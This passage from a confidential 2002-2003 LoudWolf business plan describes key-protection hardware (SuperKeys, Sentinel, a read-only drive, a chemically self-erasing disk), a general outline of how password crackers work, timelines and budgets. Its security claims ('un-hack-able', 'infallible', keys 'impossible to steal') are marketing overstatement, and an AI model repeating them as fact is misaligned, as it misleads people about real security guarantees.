startling conclusion was that irrespective of the algorithm used and the length of the key, there is no current
security method to definitively protect high-value data. Since it is the security of the key where the threat
generally lies almost never is the encryption algorithm an issue. (Unless it is intrinsically weak).
Security is strong when:
1/ The encryption algorithm is good.
2/ The key complexity and length is strong
3/ The keys themselves are protected.
Most systems fall short in items 2 & 3 above. Many keys are trivial adaptations of dictionary words and as
such are little more than “speed-bump” for hackers. Protection of keys is often an afterthought often little is
done to protect the key. It is vitally important to protect the key from the moment it is created and follow
through on this protection, for the life of the key.
CONFIDENTIAL
Page 80 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
When the cryptographic protection reaches the point of being good enough to make the cracking of the key
prohibitive, the data thief turns to an easier route, that of stealing the keys directly from the source.
“In over a decade of hacking it has never been necessary to break into crypto.
It is much, much easier to break into your system and steal your crypto keys.”
This point is fundamental. Protection of the keys is now the paramount problem facing the security industry,
not the encryption techniques used.
One can place a complex and expensive lock on your house but leaving the key under the doormat
invalidates its security potential.
Our technology not only protects these keys but also uses a proprietary technique to create and validate
them. Other aspects of our technology “fingerprint” the protected data by a close integration with the key
and verify the identity of both the sender and recipient. Our security solutions involve sophisticated software
tightly integrated with our unique “un-hack-able” hardware.
The hardware aspect of our technology is crucial to our dual goals of infallible and fail-safe security.
Although the actual physical hardware consists of a single silicon chip, its aspects can be broken down into
three distinct functions.
1/ Isolation Components
The hardware is capable of physically cutting off the communications ports of the computer acting like a pair
of spring-loaded “scissors.” Each and every point of entry and exit is protected by these “scissors” which
consist of a series of isolating switches placed in-line with the computers communications ports. The fail-safe
concept is implemented by means of so called “watch-dog” software and hardware. Each of these switches is
designed to cut off the communications ports by default unless constantly reminded not to do so by the
watch-dog software and hardware.
2/ Watch-Dog Systems
Built into the chip is a self-diagnostic capability that constantly checks and re-checks itself, the host
computer, the software component of the watch-dog, and the integrity of the secure keys.
3/ Superkeys
Hybrid “superkeys” consist of multiple, independently derived sub-keys. This is consistent with implementing
the use of long keys, making brute force cracking of the data computationally infeasible.
Our technologies focus on the protection of the keys themselves. For details on password problems and
hacker methodology see the section following the superkeys diagram.
LoudWolf technology uses hardware based key translation elevating the protection of the keys themselves to
it’s correct position of ultimate importance. The “One time Code-Pad” is the ultimate in coding methods,
clearly unbreakable if used correctly (One Time) This is the code that has been used by security service
operatives in the field for decades, their very lives depend on it’s security. Messages are encoded using a
sheet from a pad of random numbers then decoded at the receiving end by an identical sheet. If the sheets
(Or Keys) are secure and the pad is only used once then security is absolute. It relies on three essential
elements 1/ The sender and receiver must, prior to communications, share a secret (The Code-Pads) 2/ The
pads cannot be used more than once. 3/ The length of message using one pad can not be longer than the
pad itself. These aspects are all addressed in LoudWolf’s implementation of this concept as depicted below.
CONFIDENTIAL
Page 81 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
Implementation of a Hardware encoded Session key.
CONFIDENTIAL
Page 82 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
Why the Keys are so Important
We routinely use passwords or Keys to access our computers, E-mail, bank accounts, debit cards, etc. We are
usually cautioned when we create these passwords to make them hard to guess. When the password is a
cryptographic key to valuable data it should be made very difficult to guess. However when the “guesser” is
a sophisticated program running on a powerful computer “difficult” often becomes trivial.
Any password that consists of real words either singly or in combination presents a trivial problem for a
potential attacker. The so-called, “dictionary attack” uses a “dictionary” in the form of a text file containing
words, commonly-used slang, numerical constants, names, dates and keyboard patterns, etc. These lists
have been refined over the years, and are very effective indeed at cracking most commonly used passwords.
Experts advise users to substitute numbers instead of letters, drop vowels out of real words and add symbols
to make passwords more difficult to crack. In response, the dictionary attack programs have become more
sophisticated and anticipate these tactics.
Anatomy of a Key-Breaker or Password Cracker Program
A typical automated password guessing program will, more or less, follow the following sequence.
The “Dictionary Attack”
Single word dictionary attack (native language.) Using a dictionary of all real words, first and last names plus
slang words.
This dictionary is organized specifically to try the most commonly used words first i.e. Blank, PASSWORD,
ADMINISTRATOR, ADMIN, PSSWRD, TEST, GUEST, and so on.
Combination Word Attack
As above, but using a combination of two or more words
Multiple Language Variant
All of the above, but expanding the dictionaries used to include all possible languages.
Number Substitution
All of the above but including the common practice of substituting certain numbers in place of letters. (1=I)
(0=O) (5=S) also adding numbers to the ends of words such as ADMIN12 etc.
The Brute Force Attack
Systematic attack all combinations (Letters only)
Systematic attack all combinations (Letters and numbers)
Systematic attack all combinations (Letters, numbers and symbols)
Systematic attack all combinations (All possible codes)
By following above sequence, the attacker can drastically reduce the amount of time and expense required to
crack a password. Naturally, the longer the password, the more combinations there are to try. Nevertheless,
eventually, all keys will succumb to this attack. The sequence followed above exploits the natural human
tendency to use words and numbers that can easily be remembered. It is easier to remember “FLYINGTIGER12” than “%23gJ0-Jty&18H” but though these keys are of identical length, the former will crack in
seconds, the latter will take orders of magnitude longer.
The tools of the trade for the Hacker community are many, in the area of password cracking the tools they
are too numerous to catalog, a couple worthy of mention are Jack/Jill the Ripper and 10PhtCrack.
As the sophistication of the attack tools grow, the need to increase the complexity of keys increases
commensurately. Thus security experts are now recommending using at least 12 characters and ensuring
that this combination of characters has no predictable pattern. This is good advice. However, it does not
prevent the system from being compromised by the brute force attack. The net effect of using an effective
password or key is to bring the security of the key up to its full potential.
CONFIDENTIAL
Page 83 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Components of the Super-Keys Product
LoudWolf ensures that the keys are long, truly random and scrambled in hardware thus enabling the security
provided by encryption to reach its true potential which is “computationally infeasible” to crack. (Not
impossible but it would require an impossibly large number of impossibly fast computers to work on the
problem for an impossibly long period of time.)
The true potential of high-quality encryption is seldom realized. The sad reality is that key stealing is trivial by
comparison. Prevention of key stealing becomes of critical importance.
LoudWolf technology addresses each of these security issues.
1. The key length is maximized commensurate with the volume of traffic and computation power
available.
2. The keys are created in such a way so that the only possible attack would be a brute force all
combination attack.
3. The keys are created in such a way that neither the user of the computer nor the intended
recipient of the data knows the key.
4. The keys are dynamically integrated with the data itself in such a way as to provide multiple keys
per transmission.
5. Keys are generated in part by verification of the identities of the sending and receiving computers
by the use of persistent and a semi-persistent variables. incorporating within the key historically
shared secret techniques.
6. The keys are integrated and inextricably linked to hardware devices incorporated into the
technology which are not programmable or changeable in any way.
7. The keys are further protected by an additional hardware device designed to detect any
unauthorized access to either the transmitting or receiving device and respond instantly to any
attacks by the immediate isolation of the computer’s communication devices and the destruction
of the key.
8. The LoudWolf goal is nothing less than making it impossible to guess, derive or steal the data
encryption keys in any way whatsoever thus realizing the full potential of the encryption
technique used.
9. Depending on the product, we also use the hardware isolation technique to physically prevent
data theft, raising the security level to unprecedented heights.
Using the latest encryption techniques alongside with LoudWolf’s technology brings protection systems up to
their full potential. At present the use of high level encryption is almost universally abrogated by the
appallingly low security pertaining to the keys used to encrypt and decrypt the protected property.
It is the weak link in the security chain and strengthening this link presents to the attacker the formidable
problem of keys that are computationally infeasible to break and impossible to steal!
LoudWolf addresses this problem by the use of sophisticated techniques to generate and protect against
password stealing. When these techniques are implemented effectively it serves to eliminate password
stealing and realize the full potential of any security schema.
CONFIDENTIAL
Page 84 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
Key Length and Complexity Issues
Modern secure data communication relies on two fundamental concepts; namely key length and Key security.
Key length is generally expressed as a number between 64 and 4096. This number refers to the number of
bits (1s or 0s) that make up the key or password that is used to encode and decode the secure
communication. This number can be used as a rough guide to the degree of difficulty a potential attacker
would experience in an attempt and decode the communication by utilizing a password cracking program to
systematically attempted to decode the communication by using every possible key combination, in other
words unlocking the communication by using every possible key.
Clearly, the more complex the key the more difficult and time-consuming the systematic key guessing
approach will become. A considerable amount of computational power in needed to use this “Brute Force”
approach. Nevertheless such computer power is available, at a price, security based upon encryption
irrespective of the key-length should never be considered totally secure.
So called “Standard” encryption systems commonly use 64, 128 and 256 bit keys.
The brute force approach will, on average, hit upon the correct key after half the possible keys have been
tried. One might ask why various large key-length are not commonly used. To understand the reason for
this we must delve a little deeper into the process of encryption decryption. For our purposes will describe a
simple encryption system using a single key, it should be noted however, that a slightly more complex system
using a public and private key system is now the norm.

Key part one - LoudWolf generated

Key part two - Local customer keys

Key part three - STEEL generated key

Key part four - Rixa IP consumer zero knowledge previously shared secret

Key part five - LoudWolf zero knowledge previously shared secret

Key part six - random variable as previous secret
CONFIDENTIAL
Page 85 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product description
Variables as Key Components
The “Previously Shared Secret” which is incorporated into the SuperKey hardware is a crucial part
of the overall system. However, to get the most out the SuperKey system and to deal with instances
where communications may be to machines that do not have the LoudWolf hardware we make use
of persistent variables. We class these variables into three groups dependant on their length of
persistence or expectancy of accuracy. When two systems communicate they each query these
variables randomly building over time a “Shared Secret history” between the two systems, thus
developing a machine to machine “knowledge” or familiarity between the systems. In effect a shared
history. In secure communications a failure to correctly respond to a variable query will instantly
break the trust relationship and disallow the transfer.
For example, system A requests a secure file, system B requests that system A respond to a variable
query session before it will allow the transfer. B then randomly selects a dozen or so variables and
asks A to deliver the values. Since B has previously recorded the correct answers B knows in
advance what the correct answers should be. If A responds correctly then B can be sure that A is
indeed who they say they are. In this manner we enable both machines to trust the identities of each
other. In effect the machines get to know each other and will flag a problem if they suspect a
machine is an impostor. All without either of the two operators of A or B being aware of the
relationship.
The LoudWolf Hardware Protects the encryption keys, variables ensure the Machine ID and The
User needs only to identify himself to enable an unprecedented level of security.
Persistent Variables
Semi Persistent Variables
Instant Variables
Processor serial numbers
Software version numbers
User Name
Passwords
Hardware interface cards
Video Card type
Processor type
Stepping Level
Update
Previous session key values
Op system Major version
Op system Minor version
Op system patch level
Mac Address
IP Address
Cache size
Previous history file
Ram Size
AVG Page File size
Local Time Zone
Clock difference from GMT
Clock drift rate over time
Cookie values
Average number of hours in use
Last downloaded file name
Last saved file
Last logon time
Last user name used
Last logoff time
Average logon time
Ping Delay average
Language settings
Fonts available
Cache page hits
User Settings
Current fan speed
Current 12 volt supply voltage
Current processor voltage
Current 5 Volt supply voltage
number of processor threads
Time now
Current user name
Ping Now delay
GMT Time Delta
Stack size
CONFIDENTIAL
Page 86 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Super-Keys Product sample application
Secure Satellite or Terrestrial Up / Down-Link Technology
Retail Target Price
Range of approx. $20,000.00 - $200,000.00 dependent upon options selected.
Cost of Goods
Approximately $20.00 - $10,000.00 dependent upon options, ($20.00 is COG for a software only solutions.
Estimated Market
Industrial, Commercial and certain Military users of any form of wireless data transmission including, but not
limited to X, K & KU band satellite data (Both up-link and down-link); All forms of Radio and Microwave
terrestrial data transmission links, including line-of-sight, ionospheric, tropospheric and ground wave
propagation: Also including 802.11x formats, All 2.4 Giga-Hertz formats, Blue-Tooth, PCS, Wi-Fi, etc.
These wireless links range from Satellites Communications (Weather, Geological, Research, surveillance,
Military, early warning, Spy (KH series) etc. on the high end. To Local wireless “Blue-Tooth” connects cell
phones and PDAs on the low side. Our products address the inherent vulnerability of all wireless
transmissions namely, interception of the signal en-route between transmitter and receiver stations. While
this capability is assumed, our product focuses on the encryption and validation aspects of the data
transmission.
We have identified markets in the following areas.
Entertainment: Satellite delivery of 1st run movies to “Cini-Plex theaters equipped with download dishes
(microwave or KU band satellite) receiving and storing for later replay, high definition movies for use in highly
flexible scheduling of movie viewing in multi-screen theaters.
Corporate communications: With the growing popularity of Wireless Local Area Networks on corporate
campuses there has arisen a security gap. Security policies which were considered adequate for the wired
network are proving themselves unable to protect the wireless hybrid networks of today.
Technical Overview
This product is based upon a flexible combination of our military-grade SuperKey technology and various
hardware components drawn from our Sentinel and other industrial / military sensor products, either licensed
and installed during manufacture, or purchased as an add-on product to an existing desktop installation.
CONFIDENTIAL
Page 87 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
The Sentinel Series
The LoudWolf products dubbed “Sentinel” are part of an overall product deployment strategy. The core
strategy is to produce a steady growth in revenues by a controlled deployment of linked and crossover
products to a wide range of consumers. The concept is not that of an upgrade, it is more of a two-tier
approach. While the STEEL products make inroads into the military, government and industry products, the
Sentinel begins with the commercial market and ranges down to the average consumer and up towards the
STEEL area.
Many of our technologies and hardware components are incorporated in the whole spectrum of products
since, after all, the threats are universal. The Pro Hacker often does not know what lies behind a randomly
selected IP address until he breaks into it, perhaps to find my wife’s shopping list or the NORAD battle plans.
The attack methodology is the same and so, to a greater or lesser degree, the principles of defense are also
similar.
The Sentinel Sharp
The Sentinel Sharp is a LCD screen about four and a half inches across, shown here in its “Crystal” case.
(Crystal is the code name for our totally transparent, technology demonstration and development system.)
The LCD is not only the display but also the user interface. It incorporates a touch screen, which enables the
Sentinel Sharp to be configured and controlled by the local user. Behind the screen lie dual microprocessors,
memory, and interface chips. It is incorporated along with the base Sentinel into several of our products
including some of the STEEL server models. Think of it as a separate computer, complete with keyboard,
video screen, memory and all the trimmings in a 1inch flat pack. Its sole purpose: to monitor and control the
security of your main computer system. Think of it as a computer and you will get the idea of how useful
such a system could be as a security firewall and watchdog. It differs from any computer you have seen no
software, no hacking. There is of course a program running inside the Sentinel Sharp but it is entirely selfcontained within the hardware chips. These are one-time programmed by LoudWolf.
You may be aware of the term “Firm-Ware” as it refers to chip based programs. In the Sentinel, this term
needs to be modified.
After programming at the LoudWolf factory the chip is physically disabled
from being re-programmed. Perhaps we need a new moniker, “Extremely
Firm-Ware,” almost indistinguishable from hardware.
CONFIDENTIAL
Page 88 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Sentinel Product description
Retail Target Price
Approximately $190.00
Cost of Goods
Approximately $25.00
Estimated Market
5-10 % of computer installed base
Technical Overview
Product is available in two (2) distinct versions, Sentinel Gold and Sentinel Platinum (Gold being a subset of
functionality of Platinum).
Sentinel Detail:
This product has two elements: a hardware element consisting of a device connected to the user’s computer
by means of the legacy parallel printer port (note: since the advent of USB as the standard printer interface,
this port remains largely unused on most computers). The core element of the sentinel hardware is a microcontroller. This is a single-chip computer that can be factory programmed only once therefore it is
invulnerable to hacker modification. The Sentinel device has connectors for eight (8) add-on units (primarily
our own blocker devices, as well as our modified HDD), however, we will grant 3rd party manufacturers
access to interface specifications so they may develop other security related devices which can then be easily
integrated into our Sentinel. The Sentinel’s PIC micro-controller includes a “watchdog” timer that triggers a
signal at regular intervals. This signal inhibits the alert function in Sentinel’s alarm system. Any failure of the
watchdog timer (i.e. hardware failure, software error, add-on blocker alarm signal) will, by default, trigger
Sentinel’s alert function. Each of the 8 inputs can be connected to a other devices in two separate ways.
Either the signal is an alarm signal from a sensor device (an input), or this signal can act as an automatic cutoff command to an external protection device (output). The sentinel therefore acts as a command and control
hub for various other products, as well as functioning as a standalone security device.
CONFIDENTIAL
Page 89 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Sentinel Standalone Functionality
The Sentinel works in conjunction with the ‘Sentinel Avenger’ software to provide security functions.
1. Generation and matching of a unique ID code to “marry” the Sentinel and the computer. This is performed by
generating a signature derived from a random selection of components in a computer. The large number of
unique characteristics in any given computer ensures that this signature will be unique. Similarly, the Sentinel
generates its own unique identifier from a combination of its preprogrammed serial number and a random
number produced by a tunnel diode selected for its quantum noise characteristics.
2. The unique signature described above enables the Sentinel to act as a key, and in conjunction with the
Sentinel Avenger software, prevents any unauthorized use of the computer, furthermore enabling an
additional layer of security via data encryption.
3. In a similar manner to the hardware watchdog, the Sentinel monitors a signal generated by the Sentinel
Avenger software. The software constantly verifies its own integrity, which in turn (see description below)
verifies the integrity of the system software. In order to prevent the software from automatically generating
an alarm signal (fail safe), it initiates a security response thus ensuring both the hardware and software
elements are in perfect order and protection is active. Sentinel performs an algorithmic operation on all
critical system files, generating a ‘hash value’. This hash value is stored on the Sentinel’s on-board EEPROM
(Electronically Erasable Programmable Read-Only Memory) Note that this operation cannot be performed
remotely, and as a security feature, can only be modified by physically toggling a switch on the Sentinel. The
Sentinel Avenger software, using its own complimentary signature, periodically generates a hash value of
every protected system file. This hash value is transmitted to the Sentinel; any inconsistency would indicate
an illicit alteration of a system file and generate an alarm response.
4. By using the parallel port as its access to computer, the Sentinel also acts as a ‘Blocker’, but for the parallel
port. Note that the parallel is used by a certain subset of hacker ‘Mal-Ware’ as an access point for many novel
exploits involving the ‘printer spooler’ software.
The Sentinel Platinum reproduces the parallel port, enabling standard parallel port operation. Sentinel
Platinum also has the unique feature to be compatible with our modified HDD (Hot ROD), using another port
to manually shutdown both the protected and unprotected segments of the drive, in case of alarm. This
feature offers the customer relief in knowing that their data will be completely secure.
CONFIDENTIAL
Page 90 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Working Title (Hot ROD) Read Only Drive
Retail Target Price
Range of approx. $150.00 - $300.00 dependent upon storage capacity.
Cost of Goods
Approximately $60.00 - $130.00 dependent on storage capacity.
Estimated Market
All desktop computers worldwide.
Technical Overview
This product is either licensed and installed during manufacture, or purchased as an add-on product to an
existing desktop installation. The product consists of two components: hardware and software.
Hardware
Our engineers will modify the hard disk drive (HDD) at the point of manufacture. This modification varies
from drive to drive, but consists of two passive switches: The first switch selects the amount of HDD space to
be made read-only, specified in 2 GB increments. The second switch enables or disables the read-only
property.
Software
The software component of the product consists of a service. This service runs constantly, verifying byte-forbyte, the integrity and originality of all files resident in both the protected and unprotected areas of the drive.
This comparison process triggers an alarm and/or remedy procedure upon detection of discrepancy between
the read-only reference file and the corresponding file on the HDD.
Current Windows systems have a similar all software system for software integrity, it is known to be routinely
compromised by current state-of-the-art hacker software that modifies the system files, as well as the
verification files, thus preventing detection (no security).
The software is initially set up in read/write mode to create the master copies of all original system files;
thereafter that portion of the drive is switched to read only. Because it is a hardware switch, it cannot be
compromised by anything less than physical possession of the hardware. The service utilizes a small portion
of the processing power to continuously cycle through the protected files ensuring absolute integrity. The
system triggers an alarm/repair response when a changed file is detected. The frequency of these checks will
depend on the number of system files the user chooses to protect, the speed of the computer and the
percentage of system resources allocated to the service. Therefore, an alarm response will be triggered, on
average, within 50% of the entire cycle time. (Not immediately upon the hacking event.)
Designated File Protection
The software can enable the placement of files in the protected area making it impossible for them to be
changed. For designated user files, it is not possible to change them, and furthermore, the system provides
an instant alarm on the very first attempt to write to the protected area. These files, unlike those described
above, are completely protected from modification and raise an instant alarm on any modification attempt.
The user can place any file in this area, including, but not limited to critical windows system files (subject to
the dual conditions of 1. user designation of file location and 2. the file not being dynamically associated with
an unprotected file).
Note
This product does not prevent the reading of any file, but ensures the integrity of designated user files and
more importantly, serves as a trip-wire detection system for an entire class of hacking techniques which rely
upon subtle modifications of windows system files. This class of attack upon windows system files is a
cornerstone of the current suite of hacker technologies. When used in conjunction with other security
products (LW or other), this technique forms a powerful, multi-layered security ensemble. At this juncture,
we only plan support for Windows-based systems.
CONFIDENTIAL
Page 91 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
High Value Intellectual Property Disk Drive (HVIP-Drive)
This product is both a “Stand-Alone” OEM drive sold to computer manufacturers and is
also incorporated into the Rixa-STEEL-XA system.
High-Value Intellectual Property Drive (HPIV-Drive) is a custom hard-drive
manufactured for us by a leading hard-disc manufacturer. When delivered to us,
there is a safety pin, a device preventing activation of the chemical release
system. Upon installation in a Rixa STEEL server, the safety device is removed,
thus (a) enabling the intellectual property to be written to the hard-drive and (b)
activating the fail-safe chemical erasure system. The hard-drive from this
moment must remain powered on indefinitely. Loss of power or any breach of
the hard-drive case will result in the activation of the chemical erasure system
and complete, irretrievable data erasure.
CONFIDENTIAL
Page 92 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Business Plan Implementation
Overview
Given the relative economy and large potential of the high end military systems and the clear
advantage that LoudWolf would enjoy, having high profile military reference customers, it is
anticipated that apart from some technology licensing deals, we will see initial early revenues
primarily derived from our military and industrial sales. LoudWolf has already identified the existence
of a strong market demand in this area. Therefore, in summary form, our main development goals
are as follows:

Refine military product definition.

Review scientific data for short term outsourced or
licensing possibilities.

Deliver completed revenue-generation plan.

Develop Rixa STEEL software, hardware in-house
development testing mule.

Develop modular sensor array packages.

Reliability and effectiveness testing

Finalize production configuration.

Develop bill of materials and outsource quotes.

Develop demonstration and sales traveling mule.

Produce limited quantity of crystal demonstration
units for sales.

Establish international licensing program.

Commission Far-East mass-production.

Establish deployment service and support
operations center.

Establish quality and product improvement feedback cycle.
CONFIDENTIAL
Page 93 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Implementation Time Lines
Month 1:



Month 2:




Month 3:





Month 4:






Month 5:




Establish sales/marketing operations center in London.
Begin sourcing programming staff and hardware engineering in the U.S.
Initiate contacts for production factories Far-East
Presentation and ratification / product definitions / final budgets and detailed production
timelines
Software production commences
Data analysis continues
Sensor development commences. With development of a sensor test and evaluation ‘mule’ (See
figure below of the prototype for the sensor ‘mule’ development system).
Deliver marketing analysis
Licensing vs. direct sales analysis
Localization issues analysis
Demonstrate initial five to six sensor packages
Demonstrate sensor package development software beta
Status analysis leading to outsourced bid for hardware
Final software definition
Detailed software budget and milestone delivery schedule
Software team ramp up complete
Hardware development team establishes liaison procedures with software teams
Software teams split into three groups for modular self-configuration development
Software module testing procedures in place
accumulate first one third of software modules
Software team splits off consumer products
group
Delivery of second group of five to six sensor
modules
Initial demonstration of prototype development
mule
Prototype Sensor Development System
Month 6:
 Software integration complete
 Reliability testing and sensor evaluation commences
 Software team re-splits into red team, blue team for
attack defense simulation
 Bi-weekly review process implemented
 Quality assurance database established
 Delivery of third batch of five to six sensor packages
 Demonstration of beta development platform to in-house team and key beta site customers
Month 7:
 Consumer Sentinel design complete
 Red team blue team testing continues
 Quality assurance database monitored for predictable progress
 Final schedule and budget review
 Launch date established
 Customer list delivered by marketing
 Marketing commences hiring and training sales team
 Delivery of final package of sensors
 Sensor integration and combinatorial analysis commences
 Software team reconfigures into sensor package groups
CONFIDENTIAL
Page 94 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Month 8:





Month 9:








Sentinel prototype complete, software integration begins
Delivery of prototype sales and marketing demonstration sheet
Documentation of training and operation manuals
Documentation of deployment procedures and evaluation of incident-response procedures
Independent review of final product specifications marketing budgets and infrastructure plans.
STEEL hardware released to manufacturing
Hardware team reconfigured for industrial version
development
Software team reconfigures for Sentinel Avenger
product
Military support team and industrial development
team
Marketing team now fully staffed enters training
Delivery of initial marketing demonstration machines
Hardware and software teams each assigned
training experts to marketing
Marketing delivers demonstration road-show,
itinerary and budget
Month 10:
 Beta site deployed with representatives from hardware, software and marketing teams
 Software team reassigned to industrial and consumer (Sentinel)
 Hardware team reassigned to industrial and additional products (Sentinel Sharp)
Month 11:
 Beta site review
 Change implementation
 Beta site update and validation
 Industrial product definition and scheduled
delivery
 Sentinel Sharp design complete
Month 12:
 Production unit testing and evaluation
 Change and review
 Update beta sites to production teams
 Demonstration of industrial software (beta)
 Sentinel (Consumer product) released to manufacturing
 Demonstration of industrial development mule
End of First Year Summary of Achievements
By this time we hope to have reach the following broad goals:

LoudWolf has received contracts (subject to testing) for several test systems from various
military units.

LoudWolf has garnered letters of intent and / or contracts from several large industry specialist
companies for collaboration and the development of industries dependent on Ultra Secure IP
protection (Such as the movie industry).

LoudWolf has income from its consumer products and licensing divisions.

LoudWolf can predict its income based upon initial consumer response for Sentinel products
and its military contracts.
CONFIDENTIAL
Page 95 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Second Year
Month 13:
 Certification of beta military sites
 Conversion to live customers
 Release production units to sales
 Assign one third software and one third hardware teams to sales support and pre sales
 Sentinel software development continues
Month 14:
 Delivery of industrial version beta
 Finalize schedule and budgets for industrial market
 Red team blue team conversion for industrial software
 Hardware team assigned to IC
 Sentinel software development continues
Month 15:
 Software team reconfigured to sensor groupings
 Hardware team split between industrial and consumer
 Marketing task force commences consumer analysis
Month 16:
 Sentinel Software complete
 Software team switches to Avenger product
 Hardware team finalizes Sentinel Sharp product for
military use
End of Second Year Summary of Achievements
By the end of the second year, we would hope to have achieved the following broad goals:

LoudWolf has completed the development of the majority of its anticipated products. The
majority of income is derived from product sales and royalties from licensed technologies.

The first stage of worldwide deployment is complete and LoudWolf turns its marketing efforts
on “secondary market” countries, devoting much of its previously large R&D budget into
localization technology and local marketing efforts.

LoudWolf devolves its military technologies to the industrial and commercial sectors, decreasing
the difference between its military grade and industrial grade offerings, following the
philosophy of universal high-grade protection.
End of Third Year Summary of Achievements
By this time we expect to have achieved the following broad goals:






LoudWolf technologies are now fully deployed and have leadership positions in a number of
market sectors.
LoudWolf technologies are well established as the enabling technologies behind several major
industries. These industries are beginning to mature and transition from product development
to deployment.
LoudWolf Holdings Ltd. is now a well-diversified company with a finely-tuned management
structure based in London. The company seeks, in the coming years, to fine tune its marketing
strengths and eliminate its weaker sub-units in anticipation of competitive forces from other
companies.
LoudWolf continues to expand revenues from services connected with its products as opposed
to the previous emphasis on development and sales of product.
LoudWolf continues to transition away from research and development and focuses the
majority of its resources into its worldwide market development effort.
LoudWolf deploys products and technologies into its last remaining secondary markets reaching
the point of diminishing returns on product localization profits.
CONFIDENTIAL
Page 96 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Budget Assumptions
In general, we can safely assume that 80 to 90 percent of all expenses will be salary. This is typically the
case in the R&D phase of any business, especially a technology-based business such as this. The only
two exceptions worthy of consideration at this stage are the “big ticket” hardware items, these being
short-period or one-time budgetary allotments. They are:
1. Initial tooling of hardware and software labs, deposits on premises, fixtures, fitments, equipment,
software development tools and prototype production engineering hardware.
2. Payment for production units to our outsourced Far-East factory. All other expenses with the
possible exception of rent and insurance are dealt with in a fifteen percent overhead figure. This is
not to be confused with the twenty one percent “burden” which is ordinarily added to the gross
salaries of all employees covering employer’s contribution of state and federal taxes, employer’s
liability insurance, and employee benefit packages. In my experience we can expect these
assumptions, plus a very good head count estimate to produce a budget that will echo reality, if a
little conservatively, to within a very small percentage. (Typically in the order of three to five
percent.)
Salary is determined by recent experience, past histories and current industry expert estimates. All
employees are salary-classified “exempt” for tax purposes (Exempt in the US means exempt from overtime and double-time laws) except for admin and QA.
Outsourced labor will consist of legal and professional services and may on occasion be supplemented by
expert commissions. These are budgeted “ad hoc” on a best guess basis. In the event that larger
funding becomes available, this budget and schedule would be unaffected. However, the scope of
projects applying our core technologies to other market needs would result in a funding demand that
could easily benefit from between two and four times the current funding.
Average Salary Per Category of Job
Gross Salary Expressed in Thousands of US Dollars Per Annum
Programmers
Senior programmers
Lead programmers
Quality assurance engineers
Hardware engineers
Senior hardware engineers
Craftsmen
Marketing Sr. VP
Marketing Director
Research
Administration
Accounting
Sales Regional
Management President COO
Sales Area
Sales District & Industry
Management CEO
60-95
80-135
135-160
50-60
70-150
150-200
50-120
120-200
70-120
70-120
50-80
120-150
120-250
80-250
140-180
80-120
250-550
Headcount Over Time
The staffing for this suite of projects initially starts small – One hardware engineer and one software
engineer. Thereafter, growth is fed by a ‘recruiting pipeline,’ which is capable of delivering a
constant linear increase of about 1 per head per month. By month 10 we are at 12 engineering
heads, at which point we add an admin and a project manager. At month 12, leveling off at month
13, we plan to have 15 heads in engineering. Marketing starts at two, adding 5 sales staff beginning
at month 7 with an independent recruiting effort. Therefore topping out at 18-19 strong at the 18month mark.
CONFIDENTIAL
Page 97 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
REFERENCE SECTION TECHNICAL NOTES:
LOUDWOLF - RIXA STEEL UTILITY BOARD DOCUMENTATION V1.0
DESCRIPTION.
Utility functions such as instrumentation and sensor control are performed by the utility board and
several specialized satellite boards. The utility board can be used “Stand alone” as a sixteen channel
programmable controller or with the addition of remote satellite boards may be enhanced to 64
channels in its basic form. Additional expansion capability is available up to 1024 channels. Each
satellite board requires only one chip 74ALS373 to add an additional eight channels to the controller
